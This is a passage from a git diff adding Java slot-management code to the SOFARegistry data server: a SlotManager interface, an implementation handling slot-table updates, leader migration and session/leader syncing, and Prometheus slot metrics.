int n) { + Map m = new HashMap<>(); + for (Map.Entry e : syncSummaries.entrySet()) { + // at least pick one + m.put(e.getKey(), e.getValue()); + int versionSize = e.getValue().getPublisherVersions().size(); + if (versionSize == 0) { + // is empty, budget=1 + versionSize = 1; + } + n -= versionSize; + if (n <= 0) { + break; + } + } + return m; + } + + @VisibleForTesting + DatumStorage getDatumStorage() { + return datumStorage; + } + + @VisibleForTesting + DataServerConfig getDataServerConfig() { + return dataServerConfig; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotManager.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotManager.java new file mode 100644 index 000000000..661044b30 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotManager.java @@ -0,0 +1,51 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.slot; + +import com.alipay.sofa.registry.common.model.Tuple; +import com.alipay.sofa.registry.common.model.slot.BaseSlotStatus; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotAccess; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import java.util.List; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-10-30 10:46 yuzhi.lyz Exp $ + */ +public interface SlotManager { + + int slotOf(String dataInfoId); + + Slot getSlot(int slotId); + + SlotAccess checkSlotAccess(int slotId, long srcSlotEpoch, long srcLeaderEpoch); + + List getSlotStatuses(); + + boolean isLeader(int slotId); + + boolean isFollower(int slotId); + + boolean updateSlotTable(SlotTable slotTable); + + long getSlotTableEpoch(); + + void triggerUpdateSlotTable(long epoch); + + Tuple> getSlotTableEpochAndStatuses(); +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotManagerImpl.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotManagerImpl.java new file mode 100644 index 000000000..52afb1bd9 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotManagerImpl.java @@ -0,0 +1,819 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.slot; + +import static com.alipay.sofa.registry.server.data.slot.SlotMetrics.Manager.*; + +import com.alipay.sofa.registry.common.model.Tuple; +import com.alipay.sofa.registry.common.model.slot.*; +import com.alipay.sofa.registry.common.model.slot.func.SlotFunction; +import com.alipay.sofa.registry.common.model.slot.func.SlotFunctionRegistry; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.DatumStorage; +import com.alipay.sofa.registry.server.data.change.DataChangeEventCenter; +import com.alipay.sofa.registry.server.data.lease.SessionLeaseManager; +import com.alipay.sofa.registry.server.data.remoting.DataNodeExchanger; +import com.alipay.sofa.registry.server.data.remoting.SessionNodeExchanger; +import com.alipay.sofa.registry.server.data.remoting.metaserver.MetaServerServiceImpl; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.slot.SlotTableRecorder; +import com.alipay.sofa.registry.task.KeyedTask; +import com.alipay.sofa.registry.task.KeyedThreadPoolExecutor; +import com.alipay.sofa.registry.task.TaskErrorSilenceException; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.alipay.sofa.registry.util.WakeUpLoopRunnable; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.*; +import java.util.concurrent.atomic.AtomicReference; +import java.util.concurrent.locks.ReadWriteLock; +import java.util.concurrent.locks.ReentrantReadWriteLock; +import javax.annotation.PostConstruct; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-02 09:44 yuzhi.lyz Exp $ + */ +public final class SlotManagerImpl implements SlotManager { + private static final Logger LOGGER = LoggerFactory.getLogger(SlotManagerImpl.class); + + private static final Logger MIGRATING_LOGGER = LoggerFactory.getLogger("MIGRATING"); + + private static final Logger SYNC_ERROR_LOGGER = LoggerFactory.getLogger("SYNC-ERROR"); + + private static final Logger SYNC_DIGEST_LOGGER = LoggerFactory.getLogger("SYNC-DIGEST"); + + private final SlotFunction slotFunction = SlotFunctionRegistry.getFunc(); + + @Autowired private DataNodeExchanger dataNodeExchanger; + + @Autowired private SessionNodeExchanger sessionNodeExchanger; + + @Autowired private MetaServerServiceImpl metaServerService; + + @Autowired private DataServerConfig dataServerConfig; + + @Autowired private DatumStorage localDatumStorage; + + @Autowired private DataChangeEventCenter dataChangeEventCenter; + + @Autowired private SessionLeaseManager sessionLeaseManager; + + @Autowired(required = false) + private List recorders; + + private final List slotChangeListeners = new ArrayList<>(); + + private KeyedThreadPoolExecutor migrateSessionExecutor; + private KeyedThreadPoolExecutor syncSessionExecutor; + private KeyedThreadPoolExecutor syncLeaderExecutor; + + /** + * the sync and migrating may happen parallelly when slot role has modified. make sure the datum + * merging is idempotent + */ + private final SyncingWatchDog watchDog = new SyncingWatchDog(); + + private final AtomicReference updatingSlotTable = new AtomicReference(); + private final ReadWriteLock updateLock = new ReentrantReadWriteLock(); + private final SlotTableStates slotTableStates = new SlotTableStates(); + + @PostConstruct + public void init() { + initSlotChangeListener(); + initExecutors(); + ConcurrentUtils.createDaemonThread("SyncingWatchDog", watchDog).start(); + } + + void initSlotChangeListener() { + SlotChangeListener l = localDatumStorage.getSlotChangeListener(); + if (l != null) { + this.slotChangeListeners.add(l); + } + } + + void initExecutors() { + this.migrateSessionExecutor = + new KeyedThreadPoolExecutor( + "migrate-session", + dataServerConfig.getSlotLeaderSyncSessionExecutorThreadSize(), + dataServerConfig.getSlotLeaderSyncSessionExecutorQueueSize()); + + this.syncSessionExecutor = + new KeyedThreadPoolExecutor( + "sync-session", + dataServerConfig.getSlotLeaderSyncSessionExecutorThreadSize(), + dataServerConfig.getSlotLeaderSyncSessionExecutorQueueSize()); + + this.syncLeaderExecutor = + new KeyedThreadPoolExecutor( + "sync-leader", + dataServerConfig.getSlotFollowerSyncLeaderExecutorThreadSize(), + dataServerConfig.getSlotFollowerSyncLeaderExecutorQueueSize()); + } + + @Override + public int slotOf(String dataInfoId) { + return slotFunction.slotOf(dataInfoId); + } + + @Override + public Slot getSlot(int slotId) { + final SlotState state = slotTableStates.slotStates.get(slotId); + return state == null ? null : state.slot; + } + + @Override + public SlotAccess checkSlotAccess(int slotId, long srcSlotEpoch, long srcLeaderEpoch) { + SlotTable currentSlotTable; + SlotState state; + updateLock.readLock().lock(); + try { + currentSlotTable = slotTableStates.table; + state = slotTableStates.slotStates.get(slotId); + } finally { + updateLock.readLock().unlock(); + } + + final long currentEpoch = currentSlotTable.getEpoch(); + if (currentEpoch < srcSlotEpoch) { + triggerUpdateSlotTable(srcSlotEpoch); + } + return checkSlotAccess(slotId, currentEpoch, state, srcLeaderEpoch); + } + + static SlotAccess checkSlotAccess( + int slotId, long currentSlotTableEpoch, SlotState state, long srcLeaderEpoch) { + if (state == null) { + return new SlotAccess(slotId, currentSlotTableEpoch, SlotAccess.Status.Moved, -1); + } + final Slot slot = state.slot; + if (!localIsLeader(slot)) { + return new SlotAccess( + slotId, currentSlotTableEpoch, SlotAccess.Status.Moved, slot.getLeaderEpoch()); + } + if (!state.migrated) { + return new SlotAccess( + slotId, currentSlotTableEpoch, SlotAccess.Status.Migrating, slot.getLeaderEpoch()); + } + if (slot.getLeaderEpoch() != srcLeaderEpoch) { + return new SlotAccess( + slotId, currentSlotTableEpoch, SlotAccess.Status.MisMatch, slot.getLeaderEpoch()); + } + return new SlotAccess( + slotId, currentSlotTableEpoch, SlotAccess.Status.Accept, slot.getLeaderEpoch()); + } + + @Override + public List getSlotStatuses() { + List slotStatuses = + Lists.newArrayListWithCapacity(slotTableStates.slotStates.size()); + updateLock.readLock().lock(); + try { + for (Map.Entry entry : slotTableStates.slotStates.entrySet()) { + int slotId = entry.getKey(); + SlotState slotState = entry.getValue(); + if (localIsLeader(slotState.slot)) { + LeaderSlotStatus status = + new LeaderSlotStatus( + slotId, + slotState.slot.getLeaderEpoch(), + ServerEnv.IP, + slotState.migrated + ? BaseSlotStatus.LeaderStatus.HEALTHY + : BaseSlotStatus.LeaderStatus.UNHEALTHY); + slotStatuses.add(status); + } else { + final KeyedTask syncLeaderTask = slotState.syncLeaderTask; + FollowerSlotStatus status = + new FollowerSlotStatus( + slotId, + slotState.slot.getLeaderEpoch(), + ServerEnv.IP, + syncLeaderTask != null ? syncLeaderTask.getStartTime() : 0, + slotState.lastSuccessLeaderSyncTime); + slotStatuses.add(status); + } + } + return slotStatuses; + } finally { + updateLock.readLock().unlock(); + } + } + + @Override + public boolean isLeader(int slotId) { + final SlotState state = slotTableStates.slotStates.get(slotId); + return state != null && localIsLeader(state.slot); + } + + @Override + public boolean isFollower(int slotId) { + final SlotState state = slotTableStates.slotStates.get(slotId); + return state != null && state.slot.getFollowers().contains(ServerEnv.IP); + } + + @Override + public boolean updateSlotTable(SlotTable update) { + final SlotTable curSlotTable = this.slotTableStates.table; + if (curSlotTable.getEpoch() >= update.getEpoch()) { + return false; + } + final SlotTable updating = this.updatingSlotTable.get(); + if (updating != null && updating.getEpoch() >= update.getEpoch()) { + return false; + } + recordSlotTable(update); + // confirmed that slotTable is related to us + update = update.filter(ServerEnv.IP); + + curSlotTable.assertSlotLessThan(update); + if (updating != null) { + updating.assertSlotLessThan(update); + } + + // do that async, not block the heartbeat + // v2 > v1, compareAndSet to avoid v1 cover v2 + if (updatingSlotTable.compareAndSet(updating, update)) { + watchDog.wakeup(); + LOGGER.info( + "updating slot table, new={}, current={}", update.getEpoch(), curSlotTable.getEpoch()); + return true; + } + return false; + } + + private void recordSlotTable(SlotTable slotTable) { + if (recorders == null) { + return; + } + for (SlotTableRecorder recorder : recorders) { + recorder.record(slotTable); + } + } + + private void updateSlotState(SlotTable updating) { + for (Slot s : updating.getSlots()) { + SlotState state = slotTableStates.slotStates.get(s.getId()); + listenAdd(s); + if (state != null) { + state.update(s); + } else { + slotTableStates.slotStates.put(s.getId(), new SlotState(s)); + LOGGER.info("add slot, slot={}", s); + } + } + + final Iterator> it = + slotTableStates.slotStates.entrySet().iterator(); + while (it.hasNext()) { + Map.Entry e = it.next(); + if (updating.getSlot(e.getKey()) == null) { + final Slot slot = e.getValue().slot; + it.remove(); + // important, first remove the slot for GetData Access check, then clean the data + listenRemove(slot); + observeLeaderMigratingFinish(slot.getId()); + LOGGER.info("remove slot, slot={}", slot); + } + } + slotTableStates.table = updating; + observeLeaderAssignGauge(slotTableStates.table.getLeaderNum(ServerEnv.IP)); + observeFollowerAssignGauge(slotTableStates.table.getFollowerNum(ServerEnv.IP)); + } + + private static final class SlotTableStates { + volatile SlotTable table = SlotTable.INIT; + final Map slotStates = Maps.newConcurrentMap(); + } + + boolean processUpdating() { + final SlotTable updating = updatingSlotTable.getAndSet(null); + if (updating != null) { + if (updating.getEpoch() > slotTableStates.table.getEpoch()) { + // lock for update, avoid the checkAccess get the wrong epoch + updateLock.writeLock().lock(); + try { + updateSlotState(updating); + } finally { + updateLock.writeLock().unlock(); + } + List leaders = updating.transfer(ServerEnv.IP, true); + LOGGER.info("updating slot table, leaders={}, {}, ", leaders, updating); + return true; + } else { + LOGGER.warn( + "skip updating={}, current={}", updating.getEpoch(), slotTableStates.table.getEpoch()); + } + } + return false; + } + + private final class SyncingWatchDog extends WakeUpLoopRunnable { + + @Override + public void runUnthrowable() { + try { + processUpdating(); + syncWatch(); + } catch (Throwable e) { + SYNC_ERROR_LOGGER.error("[syncWatch]failed to do sync watching", e); + } + } + + @Override + public int getWaitingMillis() { + return 200; + } + } + + void syncWatch() { + final int syncSessionIntervalMs = + dataServerConfig.getSlotLeaderSyncSessionIntervalSecs() * 1000; + final int syncLeaderIntervalMs = + dataServerConfig.getSlotFollowerSyncLeaderIntervalSecs() * 1000; + final long slotTableEpoch = slotTableStates.table.getEpoch(); + for (SlotState slotState : slotTableStates.slotStates.values()) { + try { + sync(slotState, syncSessionIntervalMs, syncLeaderIntervalMs, slotTableEpoch); + } catch (Throwable e) { + SYNC_ERROR_LOGGER.error( + "[syncCommit]failed to do sync slot {}, migrated={}", + slotState.slot, + slotState.migrated, + e); + } + } + } + + boolean sync( + SlotState slotState, + int syncSessionIntervalMs, + int syncLeaderIntervalMs, + long slotTableEpoch) { + final Slot slot = slotState.slot; + if (localIsLeader(slot)) { + final KeyedTask syncLeaderTask = slotState.syncLeaderTask; + if (syncLeaderTask != null && !syncLeaderTask.isFinished()) { + // must wait the sync leader finish, avoid the sync-leader conflict with sync-session + LOGGER.warn("wait for sync-leader to finish, {}", slot, syncLeaderTask); + return false; + } + slotState.syncLeaderTask = null; + final Set sessions = metaServerService.getSessionServerList(); + if (slotState.migrated) { + syncSessions(slotState, sessions, syncSessionIntervalMs, slotTableEpoch); + } else { + syncMigrating(slotState, sessions, syncSessionIntervalMs, slotTableEpoch); + // check all migrating task + checkMigratingTask(slotState, sessions); + } + } else { + // sync leader + syncLeader(slotState, syncLeaderIntervalMs, slotTableEpoch); + } + return true; + } + + private boolean checkMigratingTask(SlotState slotState, Collection sessions) { + final Slot slot = slotState.slot; + + MIGRATING_LOGGER.info( + "[migrating]{},span={},tasks={}/{},sessions={}/{},remains={}", + slot.getId(), + System.currentTimeMillis() - slotState.migratingStartTime, + slotState.migratingTasks.size(), + slotState.migratingTasks.keySet(), + sessions.size(), + sessions, + getMigratingSpans(slotState)); + + // check all migrating task + if (slotState.migratingTasks.isEmpty() || sessions.isEmpty()) { + LOGGER.warn("sessionNodes or migratingTask is empty when migrating, {}", slot); + return false; + } + // TODO the session down and up in a short time. session.processId is important + if (slotState.isFinish(sessions)) { + // after migrated, force to update the version + // make sure the version is newly than old leader's + localDatumStorage.updateVersion(slot.getId()); + slotState.migrated = true; + final long span = System.currentTimeMillis() - slotState.migratingStartTime; + LOGGER.info( + "slotId={}, migrating finish, span={}, slot={}, sessions={}", + slot.getId(), + span, + slot, + sessions); + slotState.migratingTasks.clear(); + observeLeaderMigratingFinish(slot.getId()); + observeLeaderMigratingHistogram(slot.getId(), span); + return true; + } + return false; + } + + private Map getMigratingSpans(SlotState slotState) { + final long now = System.currentTimeMillis(); + Map spans = Maps.newTreeMap(); + for (Map.Entry e : slotState.migratingTasks.entrySet()) { + MigratingTask m = e.getValue(); + if (!m.task.isFinished() || m.task.isFailed()) { + spans.put(e.getKey(), now - m.createTimestamp); + } + } + return spans; + } + + private void syncMigrating( + SlotState slotState, + Collection sessions, + int syncSessionIntervalMs, + long slotTableEpoch) { + final Slot slot = slotState.slot; + if (slotState.migratingStartTime == 0) { + slotState.migratingStartTime = System.currentTimeMillis(); + slotState.migratingTasks.clear(); + observeLeaderMigratingStart(slot.getId()); + LOGGER.info( + "start migrating, slotId={}, sessionSize={}, sessions={}", + slot.getId(), + sessions.size(), + sessions); + } + for (String sessionIp : sessions) { + MigratingTask mtask = slotState.migratingTasks.get(sessionIp); + if (mtask == null || mtask.task.isFailed()) { + KeyedTask ktask = + commitSyncSessionTask(slot, slotTableEpoch, sessionIp, true); + if (mtask == null) { + mtask = new MigratingTask(ktask); + slotState.migratingTasks.put(sessionIp, mtask); + } else { + // fail + mtask.task = ktask; + } + // TODO add max trycount, avoid the unhealth session block the migrating + mtask.tryCount++; + continue; + } + // migrating finish. try to sync session + // avoid the time of migrating is too long and block the syncing of session + if (mtask.task.isOverAfter(syncSessionIntervalMs)) { + if (syncSession(slotState, sessionIp, syncSessionIntervalMs, slotTableEpoch)) { + LOGGER.info("slotId={}, sync session in migrating, session={}", slot.getId(), sessionIp); + } + } + } + } + + private void syncSessions( + SlotState slotState, + Collection sessions, + int syncSessionIntervalMs, + long slotTableEpoch) { + for (String sessionIp : sessions) { + syncSession(slotState, sessionIp, syncSessionIntervalMs, slotTableEpoch); + } + } + + private boolean syncSession( + SlotState slotState, String sessionIp, int syncSessionIntervalMs, long slotTableEpoch) { + final Slot slot = slotState.slot; + KeyedTask task = slotState.syncSessionTasks.get(sessionIp); + if (task == null || task.isOverAfter(syncSessionIntervalMs)) { + task = commitSyncSessionTask(slot, slotTableEpoch, sessionIp, false); + slotState.syncSessionTasks.put(sessionIp, task); + return true; + } + return false; + } + + private void syncLeader(SlotState slotState, int syncLeaderIntervalMs, long slotTableEpoch) { + final Slot slot = slotState.slot; + final KeyedTask syncLeaderTask = slotState.syncLeaderTask; + if (syncLeaderTask != null && syncLeaderTask.isFinished()) { + slotState.completeSyncLeaderTask(); + } + if (syncLeaderTask == null || syncLeaderTask.isOverAfter(syncLeaderIntervalMs)) { + // sync leader no need to notify event + SlotDiffSyncer syncer = + new SlotDiffSyncer(dataServerConfig, localDatumStorage, null, sessionLeaseManager); + SyncContinues continues = + new SyncContinues() { + @Override + public boolean continues() { + return isFollower(slot.getId()); + } + }; + SyncLeaderTask task = + new SyncLeaderTask(slotTableEpoch, slot, syncer, dataNodeExchanger, continues); + slotState.syncLeaderTask = syncLeaderExecutor.execute(slot.getId(), task); + } else if (!syncLeaderTask.isFinished()) { + if (System.currentTimeMillis() - syncLeaderTask.getCreateTime() > 5000) { + // the sync leader is running more than 5secs, print + LOGGER.info("sync-leader running, {}", syncLeaderTask); + } + } + } + + private KeyedTask commitSyncSessionTask( + Slot slot, long slotTableEpoch, String sessionIp, boolean migrate) { + SlotDiffSyncer syncer = + new SlotDiffSyncer( + dataServerConfig, localDatumStorage, dataChangeEventCenter, sessionLeaseManager); + SyncContinues continues = + new SyncContinues() { + @Override + public boolean continues() { + // if not leader, the syncing need to break + return isLeader(slot.getId()); + } + }; + SyncSessionTask task = + new SyncSessionTask( + migrate, slotTableEpoch, slot, sessionIp, syncer, sessionNodeExchanger, continues); + if (migrate) { + // group by slotId and session + return migrateSessionExecutor.execute(new Tuple(slot.getId(), sessionIp), task); + } else { + // at most there is 4 tasks for a session, avoid too many tasks hit the same session + return syncSessionExecutor.execute(new Tuple((slot.getId() % 4), sessionIp), task); + } + } + + static final class SlotState { + final int slotId; + volatile Slot slot; + volatile boolean migrated; + volatile long migratingStartTime; + volatile long lastSuccessLeaderSyncTime = -1L; + final Map migratingTasks = Maps.newTreeMap(); + final Map> syncSessionTasks = Maps.newTreeMap(); + volatile KeyedTask syncLeaderTask; + + SlotState(Slot slot) { + this.slotId = slot.getId(); + this.slot = slot; + } + + void update(Slot s) { + ParaCheckUtil.checkEquals(slotId, s.getId(), "slot.id"); + if (slot.getLeaderEpoch() != s.getLeaderEpoch()) { + this.migrated = false; + this.syncSessionTasks.clear(); + this.migratingTasks.clear(); + this.migratingStartTime = 0; + if (localIsLeader(s)) { + // leader change + observeLeaderUpdateCounter(); + } + observeLeaderMigratingFinish(slot.getId()); + LOGGER.info("update slot with leaderEpoch, exist={}, now={}", slot, s); + } + this.slot = s; + LOGGER.info("update slot, slot={}", slot); + } + + void completeSyncLeaderTask() { + if (syncLeaderTask != null && syncLeaderTask.isSuccess()) { + this.lastSuccessLeaderSyncTime = syncLeaderTask.getEndTime(); + } + } + + boolean isFinish(Collection sessions) { + if (sessions.isEmpty()) { + return false; + } + boolean finished = true; + for (String session : sessions) { + MigratingTask t = migratingTasks.get(session); + if (t == null || !t.task.isSuccess()) { + finished = false; + break; + } + } + return finished; + } + } + + static class MigratingTask { + final long createTimestamp = System.currentTimeMillis(); + KeyedTask task; + int tryCount; + + MigratingTask(KeyedTask task) { + this.task = task; + } + } + + private static final class SyncSessionTask implements Runnable { + final long startTimestamp = System.currentTimeMillis(); + final boolean migrating; + final long slotTableEpoch; + final Slot slot; + final String sessionIp; + final SlotDiffSyncer syncer; + final SessionNodeExchanger sessionNodeExchanger; + final SyncContinues continues; + + SyncSessionTask( + boolean migrating, + long slotTableEpoch, + Slot slot, + String sessionIp, + SlotDiffSyncer syncer, + SessionNodeExchanger sessionNodeExchanger, + SyncContinues continues) { + this.migrating = migrating; + this.slotTableEpoch = slotTableEpoch; + this.slot = slot; + this.sessionIp = sessionIp; + this.syncer = syncer; + this.sessionNodeExchanger = sessionNodeExchanger; + this.continues = continues; + } + + public void run() { + boolean success = false; + try { + success = + syncer.syncSession( + slot.getId(), sessionIp, sessionNodeExchanger, slotTableEpoch, continues); + if (!success) { + // sync failed + throw new RuntimeException("sync session failed"); + } + } catch (Throwable e) { + if (migrating) { + observeLeaderMigratingFail(slot.getId(), sessionIp); + SYNC_ERROR_LOGGER.error("[migrating]failed: {}, slot={}", sessionIp, slot.getId(), e); + } else { + SYNC_ERROR_LOGGER.error("[syncSession]failed: {}, slot={}", sessionIp, slot.getId(), e); + } + // rethrow silence exception, notify the task is failed + throw TaskErrorSilenceException.INSTANCE; + } finally { + SYNC_DIGEST_LOGGER.info( + "{},{},{},{},span={}", + success ? 'Y' : 'N', + migrating ? 'M' : 'S', + slot.getId(), + sessionIp, + System.currentTimeMillis() - startTimestamp); + } + } + + @Override + public String toString() { + return "SyncSession{epoch=" + + slotTableEpoch + + ", session=" + + sessionIp + + ", slot=" + + slot + + '}'; + } + } + + private static final class SyncLeaderTask implements Runnable { + final long startTimestamp = System.currentTimeMillis(); + final long slotTableEpoch; + final Slot slot; + final SlotDiffSyncer syncer; + final DataNodeExchanger dataNodeExchanger; + final SyncContinues continues; + + SyncLeaderTask( + long slotTableEpoch, + Slot slot, + SlotDiffSyncer syncer, + DataNodeExchanger dataNodeExchanger, + SyncContinues continues) { + this.slotTableEpoch = slotTableEpoch; + this.slot = slot; + this.syncer = syncer; + this.dataNodeExchanger = dataNodeExchanger; + this.continues = continues; + } + + @Override + public void run() { + boolean success = false; + try { + success = + syncer.syncSlotLeader( + slot.getId(), slot.getLeader(), dataNodeExchanger, slotTableEpoch, continues); + if (!success) { + throw new RuntimeException("sync leader failed"); + } + } catch (Throwable e) { + SYNC_ERROR_LOGGER.error( + "[syncLeader]failed: {}, slot={}", slot.getLeader(), slot.getId(), e); + // rethrow silence exception, notify the task is failed + throw TaskErrorSilenceException.INSTANCE; + } finally { + SYNC_DIGEST_LOGGER.info( + "{},L,{},{},span={}", + success ? 'Y' : 'N', + slot.getId(), + slot.getLeader(), + System.currentTimeMillis() - startTimestamp); + } + } + + @Override + public String toString() { + return "SyncLeader{epoch=" + slotTableEpoch + ", slot=" + slot + '}'; + } + } + + @Override + public void triggerUpdateSlotTable(long expectEpoch) { + // TODO + } + + @Override + public Tuple> getSlotTableEpochAndStatuses() { + updateLock.readLock().lock(); + try { + long slotTableEpoch = getSlotTableEpoch(); + List slotStatuses = getSlotStatuses(); + return Tuple.of(slotTableEpoch, slotStatuses); + } finally { + updateLock.readLock().unlock(); + } + } + + @Override + public long getSlotTableEpoch() { + return slotTableStates.table.getEpoch(); + } + + private static Slot.Role getRole(Slot s) { + return localIsLeader(s) ? Slot.Role.Leader : Slot.Role.Follower; + } + + private void listenAdd(Slot s) { + slotChangeListeners.forEach(listener -> listener.onSlotAdd(s.getId(), getRole(s))); + } + + private void listenRemove(Slot s) { + slotChangeListeners.forEach(listener -> listener.onSlotRemove(s.getId(), getRole(s))); + } + + private static boolean localIsLeader(Slot slot) { + return ServerEnv.isLocalServer(slot.getLeader()); + } + + @VisibleForTesting + void setMetaServerService(MetaServerServiceImpl metaServerService) { + this.metaServerService = metaServerService; + } + + @VisibleForTesting + void setDataServerConfig(DataServerConfig dataServerConfig) { + this.dataServerConfig = dataServerConfig; + } + + @VisibleForTesting + void setLocalDatumStorage(DatumStorage localDatumStorage) { + this.localDatumStorage = localDatumStorage; + } + + @VisibleForTesting + void setDataChangeEventCenter(DataChangeEventCenter dataChangeEventCenter) { + this.dataChangeEventCenter = dataChangeEventCenter; + } + + @VisibleForTesting + void setSessionLeaseManager(SessionLeaseManager sessionLeaseManager) { + this.sessionLeaseManager = sessionLeaseManager; + } + + @VisibleForTesting + SlotManagerImpl setRecorders(List recorders) { + this.recorders = recorders; + return this; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotMetrics.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotMetrics.java new file mode 100644 index 000000000..5f41531d3 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotMetrics.java @@ -0,0 +1,208 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.slot; + +import io.prometheus.client.Counter; +import io.prometheus.client.Gauge; +import io.prometheus.client.Histogram; + +public final class SlotMetrics { + private SlotMetrics() {} + + static final class Manager { + private static final Counter LEADER_UPDATE_COUNTER = + Counter.build() + .namespace("data") + .subsystem("slot") + .name("leader_update_total") + .help("count leader update") + .register(); + + private static final Gauge LEADER_ASSIGN_GAUGE = + Gauge.build() + .namespace("data") + .subsystem("slot") + .name("leader_assign_total") + .help("leader assign") + .register(); + + private static final Gauge FOLLOWER_ASSIGN_GAUGE = + Gauge.build() + .namespace("data") + .subsystem("slot") + .name("follower_assign_total") + .help("follower assign") + .register(); + + private static final Gauge LEADER_MIGRATING_GAUGE = + Gauge.build() + .namespace("data") + .subsystem("slot") + .name("leader_migrating_total") + .help("count leader is migrating") + .labelNames("slot") + .register(); + + private static final Counter LEADER_MIGRATING_FAIL_COUNTER = + Counter.build() + .namespace("data") + .subsystem("slot") + .name("leader_migrating_fail_total") + .help("count leader migrating fail") + .labelNames("slot", "session") + .register(); + + private static final Histogram LEADER_MIGRATING_HISTOGRAM = + Histogram.build() + .namespace("data") + .subsystem("slot") + .name("leader_migrating_secs") + .help("migrating in seconds.") + .labelNames("slot") + .buckets(3, 5, 10, 20, 30, 60, 120, 180, 240) + .register(); + + static void observeLeaderUpdateCounter() { + LEADER_UPDATE_COUNTER.inc(); + } + + static void observeLeaderAssignGauge(int num) { + LEADER_ASSIGN_GAUGE.set(num); + } + + static void observeFollowerAssignGauge(int num) { + FOLLOWER_ASSIGN_GAUGE.set(num); + } + + static void observeLeaderMigratingStart(int slotId) { + LEADER_MIGRATING_GAUGE.labels(String.valueOf(slotId)).set(1); + } + + static void observeLeaderMigratingFinish(int slotId) { + LEADER_MIGRATING_GAUGE.labels(String.valueOf(slotId)).set(0); + } + + static void observeLeaderMigratingFail(int slotId, String sessionIp) { + LEADER_MIGRATING_FAIL_COUNTER.labels(String.valueOf(slotId), sessionIp).inc(); + } + + static void observeLeaderMigratingHistogram(int slotId, long millis) { + // seconds + LEADER_MIGRATING_HISTOGRAM.labels(String.valueOf(slotId)).observe(millis / 1000d); + } + } + + static final class SyncSession { + private static final Counter SYNC_SESSION_ID_COUNTER = + Counter.build() + .namespace("data") + .subsystem("sync") + .name("session_id_total") + .help("count sync session dataInfoIds") + .labelNames("slot") + .register(); + + private static final Counter SYNC_SESSION_ID_NUM_COUNTER = + Counter.build() + .namespace("data") + .subsystem("sync") + .name("session_id_num_total") + .help("count sync session dataInfoId's num") + .labelNames("slot") + .register(); + + private static final Counter SYNC_SESSION_PUB_COUNTER = + Counter.build() + .namespace("data") + .subsystem("sync") + .name("session_pub_total") + .help("count sync session pubs") + .labelNames("slot") + .register(); + + private static final Counter SYNC_SESSION_PUB_NUM_COUNTER = + Counter.build() + .namespace("data") + .subsystem("sync") + .name("session_pub_num_total") + .help("count sync session pub's num") + .labelNames("slot") + .register(); + + static void observeSyncSessionId(int slotId, int idNum) { + final String str = String.valueOf(slotId); + SYNC_SESSION_ID_COUNTER.labels(str).inc(); + SYNC_SESSION_ID_NUM_COUNTER.labels(str).inc(idNum); + } + + static void observeSyncSessionPub(int slotId, int pubNum) { + final String str = String.valueOf(slotId); + SYNC_SESSION_PUB_COUNTER.labels(str).inc(); + SYNC_SESSION_PUB_NUM_COUNTER.labels(str).inc(pubNum); + } + } + + static final class SyncLeader { + private static final Counter SYNC_LEADER_ID_COUNTER = + Counter.build() + .namespace("data") + .subsystem("sync") + .name("leader_id_total") + .help("count sync leader dataInfoIds") + .labelNames("slot") + .register(); + + private static final Counter SYNC_LEADER_ID_NUM_COUNTER = + Counter.build() + .namespace("data") + .subsystem("sync") + .name("leader_id_num_total") + .help("count sync leader dataInfoId's num") + .labelNames("slot") + .register(); + + private static final Counter 